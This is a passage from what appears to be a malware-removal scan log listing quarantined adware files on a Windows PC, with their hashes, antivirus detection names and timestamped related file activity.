      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:10)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : 91B0A78864DA2EF1922BC17C01157E8208C7265500CE2D4CFFB54D53F3B45EA0
    > Bitdefender  . . . : Gen:Variant.Graftor.317626
      Fuzzy  . . . . . . : 108.0

   C:\FRST\Quarantine\C\Program Files (x86)\Plidaing\Konoghstuqtainmodule.dll
      Size . . . . . . . : 154.624 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:10)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : F392EB7C794A44632AA686206501F7F6640D359DDCBB8F2CF02A48930D9870A8
    > Bitdefender  . . . : Gen:Variant.Application.Elex.39
      Fuzzy  . . . . . . : 108.0

   C:\FRST\Quarantine\C\Program Files (x86)\Thteckganoied\CrashReport.dll
      Size . . . . . . . : 122.880 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:39)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : 91B0A78864DA2EF1922BC17C01157E8208C7265500CE2D4CFFB54D53F3B45EA0
    > Bitdefender  . . . : Gen:Variant.Graftor.317626
      Fuzzy  . . . . . . : 108.0

   C:\FRST\Quarantine\C\Program Files (x86)\Thteckganoied\Konoghstuqtainmodule.dll
      Size . . . . . . . : 154.624 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:39)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : F392EB7C794A44632AA686206501F7F6640D359DDCBB8F2CF02A48930D9870A8
    > Bitdefender  . . . : Gen:Variant.Application.Elex.39
      Fuzzy  . . . . . . : 108.0

   C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\uninstall.exe
      Size . . . . . . . : 91.149 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:15:46)
      Entropy  . . . . . : 6.8
      SHA-256  . . . . . : FF17331317EF96C279C0FD6D76A2843152B51DE6AAAB599463CDBE477800E76B
      Product  . . . . . : OtherSearch
      Publisher  . . . . : Skyler Emil
      Description
      Version  . . . . . : 4.0.0.0
      LanguageID . . . . : 0
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.Agent.xxdeio
      Fuzzy  . . . . . . : 102.0
      Forensic Cluster
         -44.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\60\027FD48E9466B40C.dat
         -43.9s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\
         -43.9s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\index
         -43.8s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\1\
         -43.8s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\1\6\
         -43.8s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\1\6\9021abb1151695
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\b\
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\b\1\
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\b\1\ce18919486573a
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\e\
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\e\5\
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\e\5\db48784a09d8ae
         -42.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\3F2D08DD491F7BB6.dat
         -42.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\
         -39.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\66\3F2D08DD491F7BB6.dat
         -39.3s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCookies\02X1AKGS.cookie
         -39.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\16\4539F1E4C2AF334C.dat
         -38.4s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{077EE3F0-62E3-4E55-9D13-A1BEA34C8426}
         -37.7s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_61E401EE1BA6E7733D4816CE0329E417
         -37.7s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_61E401EE1BA6E7733D4816CE0329E417
         -37.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\35\
         -37.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\35\2D51D2D4DEE3AC6F.dat
         -37.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\28\CF74ECF961265988.dat
         -37.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\3099938AC82BEAC6.dat
         -36.7s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\A5F4C763F88647462D6CC3BD2C4D68EA
         -35.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\19\
         -35.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\19\C60265D2AEF7475B.dat
         -35.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\02\ED33484DA71254E2.dat
         -35.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\58\8ADB242C25ABC556.dat
         -35.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\89\7EA0D5541E6D44E5.dat
         -35.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\02\94DDF3D411512896.dat
         -35.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\00\908B870CD63A5850.dat
         -35.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\52\6D89BF061152B6F8.dat
         -34.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\88\ED85F9E93752E5A0.dat
         -34.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\23\
         -34.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\23\AAEDB4F156B30F9B.dat
         -34.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{5CE1F024-3B70-469E-841E-569BAA050A16}
         -33.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\35\DA01BBA6F7AF3E3B.dat
         -31.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\89\7EA0D5541E6D44E5.dat
         -27.8s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\datareporting\archived\2017-02\1486934118474.004ed726-e962-412e-b280-4549e1511a8c.main.jsonlz4
         -27.8s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\saved-telemetry-pings\004ed726-e962-412e-b280-4549e1511a8c
         -24.6s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_BEB725938A5DDBC0476AEF53D3F3399C
         -24.6s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_BEB725938A5DDBC0476AEF53D3F3399C
         -23.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\35\DA01BBA6F7AF3E3B.dat
         -23.4s C:\ProgramData\Microsoft\Windows Defender\Scans\RtSigs\Data\2741755e95077aca48c7a1c4364436f22e03efeb
         -22.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{27B248FF-42DF-4C66-9927-E998ECC1C67F}
         -22.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\07\
         -22.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\07\3004FAB3-8238-4106-9960-4145311D9DC9
         -20.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\63\0D60310A3DE505EB.dat
         -19.1s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Flex-Fix.exe.log
         -18.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\63\0D60310A3DE505EB.dat
         -18.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\80\
         -18.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\80\87EB7F301000A1E4.dat
         -18.2s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\15\
         -18.2s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\15\C84F83C6-757C-4DA0-83A9-832C2044BAA3
         -17.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\16\A35F04C07F086E0C.dat
         -17.6s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\3023AE8DBCD4D9CC28BFB0B87DE1F7B2
         -17.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\77\F6A4E5AA0BD799E5.dat
         -17.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\47\0A58E2141BC5D6FF.dat
         -17.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\53\F539CAB543896981.dat
         -17.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\56\E08F1601340D9930.dat
         -16.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\76\4D1506E35A18A4C0.dat
         -13.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\16\A35F04C07F086E0C.dat
         -13.6s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCookies\D8UAI5I0.cookie
         -13.4s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{2DB708F8-9FF1-4350-B1A6-0720A61FE57D}
         -12.4s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\1B\
         -12.4s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\1B\1B33F58BCBEAA336FCAC78EFD0C3B152C653F564
         -12.4s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries\{80030EA5-0000-0000-2755-74F4A7D28A96}
         -12.4s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\1B\
         -12.4s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\1B\1B33F58BCBEAA336FCAC78EFD0C3B152C653F564
         -11.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\96\87D9361895BDB728.dat
         -11.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\69\F1B7787110988501.dat
         -10.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\045B2201FB68EBA634B6A7ED6EBC470B
         -10.2s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\ext[1].htm
         -9.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{B57C28AF-09A8-4AFA-A7F4-1088010BD300}
         -9.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\68\E0D7C962546966F4.dat
         -9.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\48\
         -9.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\48\D2A3F94A0D56F3DC.dat
         -9.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\06\
         -9.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\06\72812E563511C7DE.dat
         -9.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\31\
         -9.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\31\46194FA3B215CD4B.dat
         -9.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\39\E1736E0D64F753FB.dat
         -9.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\98\1D69515B65576102.dat
         -9.6s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\
         -7.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\95\6F1BEABC1717AED7.dat
         -5.7s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C84A.tmp.log
         -4.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\69\5CD3D2EEE75040AD.dat
         -4.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\92\79C3EF559B624514.dat
         -4.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\11\8FEE14203F7DDA1B.dat
         -3.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\14\80D5272735EAE1C6.dat
         -3.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\37\
         -3.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\37\63854D67A493D655.dat
         -1.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\53\BEF4A957CC80EB15.dat
         -0.4s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\updengine.exe
          0.0s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\uninstall.exe
          0.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\30\
          0.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\30\04AD70B1461F0422.dat
          0.5s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zaamla.exe.log
          2.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\42\
          2.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\42\5A8E78D960A9B016.dat
          2.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\19\43AAB79DC8C9763F.dat
          2.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\86\D587334F575975FA.dat
          3.7s C:\Users\Barbara\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\8059E9A0D314877E40FE93D8CCFB3C69_90ECA0B4D2228AFE69CC082886D8E2BE
          3.7s C:\Users\Barbara\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_90ECA0B4D2228AFE69CC082886D8E2BE
          4.1s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\s.xml
          6.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\39\1218955AE2A1AB5F.dat
          6.6s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{E080DC10-3E81-479D-BDB8-C3846F374A65}
          6.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\ext[1].htm
          8.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\98\A56ABAE9E895454E.dat
          8.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\41\
          8.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\41\8B2CE58878430E61.dat
          8.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\68\E0D7C962546966F4.dat
          8.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\14\363DA3BE40841B26.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\23\C308C81C5D4FD43F.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\66E4054878E2C722.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\84\D38C0DC1B5C2FAFC.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\81\59654F7CFB1518C5.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\25\78BAC9FAB06D1FED.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\54\07695BEF7F2F153E.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\57\
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\57\70F40DF465C7C45D.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\89\20A73F6863A4B6E9.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\33\439C2791622F42F5.dat
          8.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\00\12FF45C68065A628.dat
          8.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\55\A13DACFD4512E8EF.dat
          9.4s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF
          9.4s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF
          9.5s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\705A76DE71EA2CAEBB8F0907449CE086_4C70C2683402FDFCF83B9865CC4FE25B
          9.5s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\705A76DE71EA2CAEBB8F0907449CE086_4C70C2683402FDFCF83B9865CC4FE25B
         10.4s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\settib[1].ex_
         10.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\98\A56ABAE9E895454E.dat
         11.7s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\LegSet5[1].ex_
         12.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\33\F4969D3F7B8FD519.dat
         12.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{A9A05D7F-39D6-4F69-97AF-0B44F9A5128E}
         13.5s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\CB\
         13.5s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\CB\CB3B5EA91ADCEC54F836EC4977C3A70037D97A32
         13.6s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries\{80032CF2-0000-0000-67FF-0B68D700BD65}
         13.6s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\CB\
         13.6s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\CB\CB3B5EA91ADCEC54F836EC4977C3A70037D97A32
         13.6s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries\{80033B91-0000-0000-16EF-37CA3DA585C6}
         15.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\78\
         15.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\78\EEEDBB2DD87AA896.dat
         15.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\431B8774-0AEC-4DDF-AFCA-CDB4A28C453A[1].htm
         16.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCookies\NNOIZZAK.cookie
         18.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\78\EEEDBB2DD87AA896.dat
         19.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\73\4BBB9B08EAE2F661.dat
         20.2s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\BA76C84DACBD991C36125B7F4B8B26A9
         22.4s C:\Users\Barbara\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\279986\1486934168
         22.9s C:\Users\Barbara\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\789de393af8a3b32162638775e4389cb46329688d7f2bdaed03bafd3990a03a2
         22.9s C:\Users\Barbara\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\795c91a7347ca63ef05ed9274ab9e6227a5a7f6a2a8833481cb2e820ab39fc62
         23.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{4DBF7A0E-1DC7-4632-8F50-E7E1FAB7CBB3}
         24.7s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\41BEA2C434093546D715CD7AF422C5A2
         24.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\42\9358653C34B0C0A6.dat
         28.4s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\sange[1].ex_
         29.7s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\2OT58FTF\peri[1].ex_
         29.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\51\2C9CD63D3378C2D3.dat
         30.1s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8828F39C7C0CE9A14B25C7EB321181BA_8C550960E440B9C3B93A6A0AA915C9BE
         30.1s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8828F39C7C0CE9A14B25C7EB321181BA_8C550960E440B9C3B93A6A0AA915C9BE
         30.1s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\89394434080B4DDFB94582252924A22B_9783957CFF0F1F1D112FB396EED4DB53
         30.1s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\89394434080B4DDFB94582252924A22B_9783957CFF0F1F1D112FB396EED4DB53
         31.4s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\smp2[1].exe
         31.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\64\B4690B1D1CE442E8.dat
         32.2s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\datareporting\archived\2017-02\1486934178480.85a6efbc-5000-45cc-a22d-2ed50ca5eb1b.main.jsonlz4
         32.2s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\saved-telemetry-pings\85a6efbc-5000-45cc-a22d-2ed50ca5eb1b
         32.2s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4780BD8BD932150ED949E0EE026AEB0_646D4B8EA018D0844AB54FF5FED9EF80
         32.2s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4780BD8BD932150ED949E0EE026AEB0_646D4B8EA018D0844AB54FF5FED9EF80
         32.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\30\282BC7862C25E5EA.dat
         32.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\33\79979684BC074131.dat
         32.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\20\B865640E5DE9B0A4.dat
         32.5s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\993FFD97CEB0680CE8107AA979DE699C_D8E46797ED739339356DA70D4226D30C
         32.5s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\993FFD97CEB0680CE8107AA979DE699C_D8E46797ED739339356DA70D4226D30C
         33.1s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\peedg[1].ex_
         34.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\64\E5E32F81709B7008.dat
         34.2s C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk
         34.6s C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
         39.8s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{11FF4840-2DC9-44B6-B7D0-FC03F240BA57}
         47.0s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\peri2[1].ex_
         47.4s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\45AD3DFC0F601EFD04319173B1CF0640
         47.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\96\
         47.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\96\41C9877C87CEAA8C.dat
         48.3s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\57B9457E15A5EA3858971144F8105D17
         49.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\96\41C9877C87CEAA8C.dat
         50.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\58\97B91F505A156806.dat
         50.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\58\
         52.1s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\
         52.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\21\BCD485E9DF91DFE5.dat
         52.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\21\BCD485E9DF91DFE5.dat
         52.9s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\8K5F5GX6A.exe.config
         53.0s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\cast.config
         53.1s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\uninstaller.exe.config
         53.1s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\cqVhJCNVN.exe.log
         53.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\98\258C867135802C4A.dat
         53.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\98\258C867135802C4A.dat
         53.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\40\C7CCCEBACF75171C.dat
         60.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{2D1B890F-BDF1-4A15-BD52-D7EE605CCAD4}
         71.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\60\60E0970FEE313FF4.dat
         71.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\60\60E0970FEE313FF4.dat

   C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\updengine.exe
      Size . . . . . . . : 1.665.536 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:15:45)
      Entropy  . . . . . : 6.3
      SHA-256  . . . . . : 1FF27CB11346BF4401ABE3BABA3BCECCA01EAB3CA0AA57C4AE59A82AFC63D8E8
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.Agent.xxderw
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -43.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\60\027FD48E9466B40C.dat
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\
         -43.5s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\index
         -43.4s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\1\
         -43.4s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\1\6\
         -43.4s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\1\6\9021abb1151695
         -43.1s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\b\
         -43.1s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\b\1\
         -43.1s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\b\1\ce18919486573a
         -43.0s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\e\
         -43.0s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\e\5\
         -43.0s C:\Users\Barbara\AppData\Roaming\NVIDIA\ComputeCache\e\5\db48784a09d8ae
         -42.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\3F2D08DD491F7BB6.dat
         -42.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\
         -38.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\66\3F2D08DD491F7BB6.dat
         -38.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCookies\02X1AKGS.cookie
         -38.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\16\4539F1E4C2AF334C.dat
         -37.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{077EE3F0-62E3-4E55-9D13-A1BEA34C8426}
         -37.3s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_61E401EE1BA6E7733D4816CE0329E417
         -37.3s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_61E401EE1BA6E7733D4816CE0329E417
         -36.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\35\
         -36.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\35\2D51D2D4DEE3AC6F.dat
         -36.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\28\CF74ECF961265988.dat
         -36.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\3099938AC82BEAC6.dat
